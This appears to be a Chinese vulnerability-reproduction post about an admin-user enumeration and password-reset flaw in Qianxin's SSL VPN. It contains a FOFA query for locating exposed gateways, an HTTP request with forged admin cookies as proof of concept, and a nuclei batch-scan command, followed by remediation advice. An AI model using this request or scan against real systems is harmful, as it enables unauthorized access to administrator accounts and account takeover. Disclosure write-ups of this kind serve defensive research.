0x02
漏洞概述
Vulnerability Overview
奇安信是面向政府、企业、金融、能源、运营商等行业客户推出的,解决客户通过互联网使用电脑及智能终端远程办公、专网环境办公等场景的安全接入问题,实现客户5A级办公。安全接入网关系统(SSL VPN)在满足客户的身份安全、传输加密、访问授权、日志追溯等多种安全需求基础上,针对 BYOD 及 CYOD 等移动办公场景,提供统一的安全办公接入入口、门户式单点登录、应用 APP安全加固、移动应用数据安全,从而为客户提供“一站式”安全移动办公解决方案。
该SSL VPN系统存在未授权管理用户遍历+任意账号密码修改漏洞,攻击者通过漏洞可以获取服务器的敏感信息。
0x03
漏洞复现
Vulnerability Recurrence
fofa:title=“奇安信vpn”
1.执行如下POC,进而获取绝对路径的敏感信息。
GET /admin/group/x_group.php?id=1 HTTP/1.1
Host: {{Hostname}}
Cookie: admin_id=1; gw_admin_ticket=1;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
-------------------------------------
其中Hostname为目标漏洞平台的实际地址或域名
2.【郑重声明】由于该产品漏洞危害等级较高,为避免被他人不当利用,正式发布软文之前,团队已致电官方并说明实际情况,在征求同意后,允许公布验证脚本用于学习与研究,同时官方希望广大白帽子以合法的手段助力VPN产品的安全稳定与可靠提升。
维护国家网络安全,人人皆有责任;
助力国家网络产品,人人应尽义务;
如果您已发现官方产品(不限VPN)漏洞,可通过以下方式联系他们。
(文章仅限技术交流,禁止非授权操作!)
0x04
漏洞脚本
Vulnerability script
1.Nuclei验证脚本命令使用如下:
nuclei.exe -t QianxinVpn_Password_Reset.yaml -l QianxinVpn_Password_Reset_Subs.txt
--------------------------------------------
QianxinVpn_Password_Reset_Subs.txt可以结合实际情况自定义
--------------------------------------------
2.Nuclei的运行截图如下:
3.关注公众号并回复:奇安信VPN,获取脚本。
0x05
修复建议
Repair Suggestions
1.实施产品的权限访问控制,降低互联网搜索引擎的查询。
2.加强后台认证要求(如AAAA策略等),提高口令的安全性。
3.增强关键页面的安全性,提升WEB后台的安全访问控制权限能力。
原文始发于微信公众号(数字人才创研院):漏洞复现|奇安信VPN存在未授权管理用户遍历+任意账号密码修改漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论